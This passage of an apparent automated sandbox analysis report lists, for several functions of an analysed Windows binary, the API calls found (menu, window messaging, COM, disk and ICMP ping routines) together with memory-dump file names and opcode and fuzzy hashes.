                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                                                                                                                      • String ID: 0.0.0.0
                                                                                                                                                                                                                                                      • API String ID: 2620052-3771769585
                                                                                                                                                                                                                                                      • Opcode ID: 5e10f7bcd4e8d0a687b3aeef48c6391a1ecde5714b26a5aeeceda46caa494abc
                                                                                                                                                                                                                                                      • Instruction ID: d358c566bd37c607e7e3866a6a4a6b3ed079b2cc21b71fec7831074d6d8d1309
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5e10f7bcd4e8d0a687b3aeef48c6391a1ecde5714b26a5aeeceda46caa494abc
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8F113632904209ABCB24AB70AC0AEDA77ACEF41721F010069F505E61C0FFB4EE85BB51
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00EE5047
                                                                                                                                                                                                                                                        • Part of subcall function 00EE7C0E: __getptd_noexit.LIBCMT ref: 00EE7C0E
                                                                                                                                                                                                                                                      • __gmtime64_s.LIBCMT ref: 00EE50E0
                                                                                                                                                                                                                                                      • __gmtime64_s.LIBCMT ref: 00EE5116
                                                                                                                                                                                                                                                      • __gmtime64_s.LIBCMT ref: 00EE5133
                                                                                                                                                                                                                                                      • __allrem.LIBCMT ref: 00EE5189
                                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EE51A5
                                                                                                                                                                                                                                                      • __allrem.LIBCMT ref: 00EE51BC
                                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EE51DA
                                                                                                                                                                                                                                                      • __allrem.LIBCMT ref: 00EE51F1
                                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EE520F
                                                                                                                                                                                                                                                      • __invoke_watson.LIBCMT ref: 00EE5280
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 384356119-0
                                                                                                                                                                                                                                                      • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                                                                                                                                                                                                      • Instruction ID: 942534cb5ee01a08b8cdb795ee6ba93e9dd4fea03f63d93dc4a46c24f05590d7
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7E71C473A01F5FABD7149E6ACC41B6AB3F8AF44368F14522AF610F6681E770D9408BD0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00F04DF8
                                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(00F81708,000000FF,00000000,00000030), ref: 00F04E59
                                                                                                                                                                                                                                                      • SetMenuItemInfoW.USER32(00F81708,00000004,00000000,00000030), ref: 00F04E8F
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000001F4), ref: 00F04EA1
                                                                                                                                                                                                                                                      • GetMenuItemCount.USER32(?), ref: 00F04EE5
                                                                                                                                                                                                                                                      • GetMenuItemID.USER32(?,00000000), ref: 00F04F01
                                                                                                                                                                                                                                                      • GetMenuItemID.USER32(?,-00000001), ref: 00F04F2B
                                                                                                                                                                                                                                                      • GetMenuItemID.USER32(?,?), ref: 00F04F70
                                                                                                                                                                                                                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00F04FB6
                                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F04FCA
                                                                                                                                                                                                                                                      • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F04FEB
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4176008265-0
                                                                                                                                                                                                                                                      • Opcode ID: 854d698e8e182b650f3c8fe0d2e8a604d4bcfee455f926aff4aca32f4de36ab3
                                                                                                                                                                                                                                                      • Instruction ID: de21feae00821970fbac65eae4d748c5df30990e698b1994ec0d669b34968b62
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 854d698e8e182b650f3c8fe0d2e8a604d4bcfee455f926aff4aca32f4de36ab3
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9C619DB5A0024AAFDB20CFA4DC88AAE7BB8FB41315F140159FA51A32D1D770AD45FB20
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00F29C98
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00F29C9B
                                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00F29CBF
                                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00F29CD0
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00F29CE2
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00F29D5A
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessageSend$LongWindow_memset
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 830647256-0
                                                                                                                                                                                                                                                      • Opcode ID: 20509a5ee14743f37030217449c33cd4c9d95ce92e753f50bc1ec11f17dee9ea
                                                                                                                                                                                                                                                      • Instruction ID: ba9f5d61df39161506e2aacdde34842a1e3def94a5aaa2c6a90714319eece1d3
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 20509a5ee14743f37030217449c33cd4c9d95ce92e753f50bc1ec11f17dee9ea
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5F618C75A00218AFDB10DFA8DC81EEE77B8EF09714F144159FA44E7291D7B4AD42EB60
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 00EF94FE
                                                                                                                                                                                                                                                      • SafeArrayAllocData.OLEAUT32(?), ref: 00EF9549
                                                                                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 00EF955B
                                                                                                                                                                                                                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 00EF957B
                                                                                                                                                                                                                                                      • VariantCopy.OLEAUT32(?,?), ref: 00EF95BE
                                                                                                                                                                                                                                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 00EF95D2
                                                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00EF95E7
                                                                                                                                                                                                                                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 00EF95F4
                                                                                                                                                                                                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00EF95FD
                                                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00EF960F
                                                                                                                                                                                                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00EF961A
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2706829360-0
                                                                                                                                                                                                                                                      • Opcode ID: 89bc7025b74df7f449821ea4a36e5b640767d9866c6ff92eeb92fda4c5cfe87e
                                                                                                                                                                                                                                                      • Instruction ID: 1b98c41e0e03f7ff58409272e0a3631442ded0fc09c5de222c5ec8b1124d27e3
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 89bc7025b74df7f449821ea4a36e5b640767d9866c6ff92eeb92fda4c5cfe87e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 75413E35A0021DAFCB01DFA4D848AEEBBB9FF58354F008065E951F7261DB31EA45DBA0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00EC936C: __swprintf.LIBCMT ref: 00EC93AB
                                                                                                                                                                                                                                                        • Part of subcall function 00EC936C: __itow.LIBCMT ref: 00EC93DF
                                                                                                                                                                                                                                                      • CoInitialize.OLE32 ref: 00F1ADF6
                                                                                                                                                                                                                                                      • CoUninitialize.OLE32 ref: 00F1AE01
                                                                                                                                                                                                                                                      • CoCreateInstance.OLE32(?,00000000,00000017,00F4D8FC,?), ref: 00F1AE61
                                                                                                                                                                                                                                                      • IIDFromString.OLE32(?,?), ref: 00F1AED4
                                                                                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 00F1AF6E
                                                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00F1AFCF
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                                                                                                                                                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                                                                                                                      • API String ID: 834269672-1287834457
                                                                                                                                                                                                                                                      • Opcode ID: a99c26fad666ebe743454cfb042c83588a9e722ea3c34941395985b8bc7f9f3f
                                                                                                                                                                                                                                                      • Instruction ID: 47658e5e24e63da02659bdda202c58b8362cc3e5efd9e062337a8022349f289b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a99c26fad666ebe743454cfb042c83588a9e722ea3c34941395985b8bc7f9f3f
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1D61AE71609301AFC710DF65C848BAEBBE8AF89714F04441DF9859B292C770ED85EB93
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • WSAStartup.WSOCK32(00000101,?), ref: 00F18168
                                                                                                                                                                                                                                                      • inet_addr.WSOCK32(?), ref: 00F181AD
                                                                                                                                                                                                                                                      • gethostbyname.WSOCK32(?), ref: 00F181B9
                                                                                                                                                                                                                                                      • IcmpCreateFile.IPHLPAPI ref: 00F181C7
                                                                                                                                                                                                                                                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00F18237
                                                                                                                                                                                                                                                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00F1824D
                                                                                                                                                                                                                                                      • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00F182C2
                                                                                                                                                                                                                                                      • WSACleanup.WSOCK32 ref: 00F182C8
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                                                                                                                                      • String ID: Ping
                                                                                                                                                                                                                                                      • API String ID: 1028309954-2246546115
                                                                                                                                                                                                                                                      • Opcode ID: a52d04ad0a298ea9b1e7676b1ac67cb3e625c4b2c3864b366126edba6d3c5813
                                                                                                                                                                                                                                                      • Instruction ID: 5f97df0de8afd22e7ca3a5dbd7a552cc626689e7b6f34f8aec2b718fd1814751
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a52d04ad0a298ea9b1e7676b1ac67cb3e625c4b2c3864b366126edba6d3c5813
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6551B436A04740AFD711DF64CE45B6AB7E4EF45360F044929F955EB2A0DB34EC42EB42
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 00F0E396
                                                                                                                                                                                                                                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00F0E40C
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00F0E416
                                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000000,READY), ref: 00F0E483
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                                                                                                                                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                                                                                                                                                      • API String ID: 4194297153-14809454
                                                                                                                                                                                                                                                      • Opcode ID: b93ad4e8ee645185aa9ce868f28b8c8f0d5674b61eaa4affb9d3b514d3622450
                                                                                                                                                                                                                                                      • Instruction ID: de0edc1071390c3dcbaec48bc12d5305dbad0db79b2d217cd73036085c297af5
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b93ad4e8ee645185aa9ce868f28b8c8f0d5674b61eaa4affb9d3b514d3622450
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6331823EA00209ABDB01DF64C945FADB7F4EF54314F14841AE505A72D1DB719A02F752
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00EFB98C
                                                                                                                                                                                                                                                      • GetDlgCtrlID.USER32 ref: 00EFB997
                                                                                                                                                                                                                                                      • GetParent.USER32 ref: 00EFB9B3
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00EFB9B6
                                                                                                                                                                                                                                                      • GetDlgCtrlID.USER32(?), ref: 00EFB9BF
                                                                                                                                                                                                                                                      • GetParent.USER32(?), ref: 00EFB9DB
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 00EFB9DE
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessageSend$CtrlParent
                                                                                                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                      • API String ID: 1383977212-1403004172
                                                                                                                                                                                                                                                      • Opcode ID: a3ea043840d25b2cc9846e7fd147f65bff603a08a7af2eaa42a7a5bc7816c3e9
                                                                                                                                                                                                                                                      • Instruction ID: 60d96975f6e701aa63b2f5aedefadbf8db15cb1e1ef7bb1ac86c60b8063ac5e9
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a3ea043840d25b2cc9846e7fd147f65bff603a08a7af2eaa42a7a5bc7816c3e9
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F821C874A0010CBFDB04ABA4CC95EFEBBB5EF5A310F104119FA55A72D1DBB55816EB20
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00EFBA73
                                                                                                                                                                                                                                                      • GetDlgCtrlID.USER32 ref: 00EFBA7E
                                                                                                                                                                                                                                                      • GetParent.USER32 ref: 00EFBA9A
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00EFBA9D
                                                                                                                                                                                                                                                      • GetDlgCtrlID.USER32(?), ref: 00EFBAA6
                                                                                                                                                                                                                                                      • GetParent.USER32(?), ref: 00EFBAC2
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 00EFBAC5
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessageSend$CtrlParent
                                                                                                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                      • API String ID: 1383977212-1403004172
                                                                                                                                                                                                                                                      • Opcode ID: 3966aacda7c72bf141dcf5de4f9420e86eb16db84bcfc985056d3eb44e9c1038
                                                                                                                                                                                                                                                      • Instruction ID: c8488d53e38826de0326aec65edca021db871af2d83b3b30a6429591c617c8e1
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3966aacda7c72bf141dcf5de4f9420e86eb16db84bcfc985056d3eb44e9c1038
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CC21C5B4A0010CBFDB01AFA4CC85FFEBBB9EF59300F144019FA55A3291DB759916AB20
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetParent.USER32 ref: 00EFBAE3
                                                                                                                                                                                                                                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 00EFBAF8
                                                                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00EFBB0A
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00EFBB85
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ClassMessageNameParentSend_wcscmp
